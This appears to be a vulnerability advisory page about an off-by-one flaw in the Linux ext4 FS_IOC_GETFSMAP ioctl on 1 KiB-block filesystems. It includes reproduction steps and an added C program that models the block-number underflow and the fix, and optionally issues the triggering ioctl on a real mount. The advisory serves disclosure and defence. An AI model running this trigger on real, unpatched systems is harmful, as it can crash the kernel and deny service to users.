Linux Kernel ext4 Filesystem Off-by-One Vulnerability in FS_IOC_GETFSMAP IOCTL

Vulnerability

An off-by-one vulnerability has been identified in the ext4 filesystem of the Linux kernel, affecting filesystems formatted with a 1 KiB block size. On such filesystems block 0 is the reserved boot block, so the first data block (s_first_data_block) is 1 rather than 0, and a physical block number of 0 lies outside the valid range. The issue arises when the FS_IOC_GETFSMAP ioctl is used to query the filesystem's physical extent map: the range keys supplied by the caller are not sufficiently validated against this lower bound, so a key that references a physical block outside the valid range causes an underflow in the block-number calculation, which disrupts normal processing and crashes the kernel. The problem has been traced back to how block numbers are calculated and validated for such keys.

Impact

Exploitation of this vulnerability causes a kernel crash. A local process that can issue FS_IOC_GETFSMAP against a mounted 1 KiB-block ext4 filesystem can therefore bring down the whole system, not just the filesystem, which amounts to a denial of service.

Reproduction

The vulnerability can be reproduced by issuing an FS_IOC_GETFSMAP ioctl call against a file or directory on an ext4 filesystem created with a 1 KiB block size (mkfs.ext4 -b 1024). The fmr_physical fields of the two keys in struct fsmap_head are byte offsets on the device; the request must use keys that reference physical blocks in a way that triggers the off-by-one error, for example a mapping range that overlaps block 0, which on a 1 KiB-block filesystem precedes the first data block and is therefore outside the valid range.
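As an added illustration that is not part of the advisory and not the kernel's code, the following C program models the failure mode described above: a start key below the first data block of a 1 KiB-block filesystem underflowing the unsigned block-to-group calculation, beside the range check that prevents it. The filesystem geometry (k1_fs) is constructed, group_no and clamp_block_range are simplified models rather than quotes of fs/ext4/fsmap.c, and getfsmap_query issues the real ioctl only when a mount point is passed on the command line; run that part only against a patched or disposable kernel.

```c
/* Added illustration, not code from the advisory or the Linux kernel: models how
 * a FS_IOC_GETFSMAP start key resolving to block 0 on a 1 KiB-block ext4
 * filesystem (first data block = 1) underflows unsigned group arithmetic, shows
 * the range check that prevents it, and issues a real query if given a mount
 * point. Build: cc -Wall -o fsmap_demo fsmap_demo.c ; run: ./fsmap_demo [mnt] */
#include <fcntl.h>
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/ioctl.h>
#include <sys/stat.h>
#include <linux/fsmap.h>

/* Constructed geometry of a small 1 KiB-block ext4 filesystem (assumed values). */
struct fs_geom {
    uint32_t blocksize_bits;   /* 10 => 1 KiB blocks */
    uint64_t first_data_block; /* ext4 s_first_data_block: 1 on 1 KiB filesystems, else 0 */
    uint64_t blocks_count;     /* total blocks on the device */
    uint32_t blocks_per_group; /* 8 * blocksize = 8192 for 1 KiB blocks */
    uint32_t groups_count;
};
static const struct fs_geom k1_fs = { 10, 1, 65536, 8192, 8 };

/* Group arithmetic in the style of ext4: blocknr - first_data_block is unsigned,
 * so block 0 on a 1 KiB filesystem wraps to 2^64-1 and the group number lands
 * far beyond groups_count (0xFFFFFFFF after truncation to 32 bits). */
static uint32_t group_no(const struct fs_geom *g, uint64_t blocknr)
{
    return (uint32_t)((blocknr - g->first_data_block) / g->blocks_per_group);
}

/* The check a hardened path needs before any group arithmetic: raise a start
 * below first_data_block, cap the end at the last block, reject empty ranges. */
static bool clamp_block_range(const struct fs_geom *g, uint64_t *start, uint64_t *end)
{
    if (*start >= g->blocks_count)
        return false;
    if (*start < g->first_data_block)
        *start = g->first_data_block;
    if (*end >= g->blocks_count)
        *end = g->blocks_count - 1;
    return *end >= *start;
}

/* Resolve byte-offset keys (the unit GETFSMAP uses) to [start_group, end_group].
 * Returns whether both groups exist; false without validation marks the spot
 * where an unchecked kernel path would operate on a nonexistent group. */
static bool resolve_groups(const struct fs_geom *g, uint64_t start_bytes,
                           uint64_t end_bytes, bool validate,
                           uint32_t *start_group, uint32_t *end_group)
{
    uint64_t start = start_bytes >> g->blocksize_bits;
    uint64_t end = end_bytes >> g->blocksize_bits;

    if (validate && !clamp_block_range(g, &start, &end))
        return false;
    *start_group = group_no(g, start);
    *end_group = group_no(g, end);
    return *start_group < g->groups_count && *end_group < g->groups_count;
}

/* One FS_IOC_GETFSMAP call with explicit byte-offset keys on the data device of
 * the filesystem mounted at path (needs a real mount; use a disposable or
 * patched kernel). Returns the record count, or -1 with errno set. */
static int getfsmap_query(const char *path, uint64_t start_bytes, uint64_t end_bytes,
                          uint32_t nrecs)
{
    struct stat st;
    int n = -1, fd = open(path, O_RDONLY);
    struct fsmap_head *head = calloc(1, sizeof(*head) + nrecs * sizeof(struct fsmap));

    if (fd >= 0 && head && fstat(fd, &st) == 0) {
        head->fmh_count = nrecs;
        /* data device id; matches the kernel's 32-bit encoding for small major/minor numbers */
        head->fmh_keys[0].fmr_device = head->fmh_keys[1].fmr_device = (uint32_t)st.st_dev;
        head->fmh_keys[0].fmr_physical = start_bytes;  /* low key, inclusive */
        head->fmh_keys[1].fmr_physical = end_bytes;    /* high key */
        head->fmh_keys[1].fmr_owner = head->fmh_keys[1].fmr_offset = ~0ULL;
        if (ioctl(fd, FS_IOC_GETFSMAP, head) == 0)
            n = (int)head->fmh_entries;
    }
    free(head);
    if (fd >= 0)
        close(fd);
    return n;
}

int main(int argc, char **argv)
{
    uint32_t sg, eg;
    /* A start key at byte 0 resolves to block 0, below the first data block. */
    bool ok = resolve_groups(&k1_fs, 0, 4096, false, &sg, &eg);
    printf("unvalidated: start_group=%u end_group=%u in_range=%d\n", sg, eg, ok);
    ok = resolve_groups(&k1_fs, 0, 4096, true, &sg, &eg);
    printf("validated:   start_group=%u end_group=%u in_range=%d\n", sg, eg, ok);
    if (argc > 1)
        printf("FS_IOC_GETFSMAP on %s returned %d records\n", argv[1],
               getfsmap_query(argv[1], 0, 4096, 16));
    return 0;
}
```

Keys in struct fsmap are byte offsets, so the request shown (start 0, end 4096) covers blocks 0 through 4 of a 1 KiB-block filesystem; block 0 is the boot block and lies below s_first_data_block, which is exactly the kind of out-of-range key the advisory describes. The unvalidated path yields start_group 0xFFFFFFFF, the validated path clamps the start to block 1 and yields group 0.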

Added: Jun 9, 2025, 7:46 PM
Updated: Jun 9, 2025, 7:46 PM

Vulnerability Rating

Custom Algorithm

spread: 9.0
impact: 2.5
exploitability: 4.3
remediation: 0.0
relevance: 0.0
threat: 4.8
urgency: 2.9
incentive: 1.7

Our algorithm analyzes dozens of metrics to generate these 8 key vulnerability categories, which are then combined to calculate the overall risk score.